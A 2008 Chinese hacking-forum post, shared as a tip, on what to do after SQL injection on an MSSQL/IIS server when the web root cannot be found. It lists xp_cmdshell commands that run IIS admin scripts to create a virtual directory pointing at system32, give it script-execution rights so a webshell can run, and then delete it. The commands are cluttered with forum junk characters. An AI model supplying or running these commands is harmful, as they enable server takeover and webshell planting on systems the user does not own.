|
- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
1 w5 ^, j3 y3 N" U& O" u+ J! Z- `5 w4 a e; P
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'6 U2 B, ]' A5 J0 F4 c* [# y
建立虚拟目录win,指向c:\windows\system32
$ j/ R3 ^# w$ S/ Z$ E8 D+ iexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'3 h& ?. ^: |# n$ Y
让win句有解析asp脚本权限7 C3 C& {: c, j0 J$ v
- A: q& F- D/ l, `6 U
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"! s3 | a& ~: ~8 ~- S4 @
删除虚拟目录。/ b4 T) I6 T1 Z/ n+ @) ?; q; v" ]+ X! v
找不到web绝对路径的一种解决办法,, X7 @" _1 r) }- T6 }) D
# `6 H! l1 k% k1 @* W2 ]403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|
发表于 2008-10-22 14:38
| 
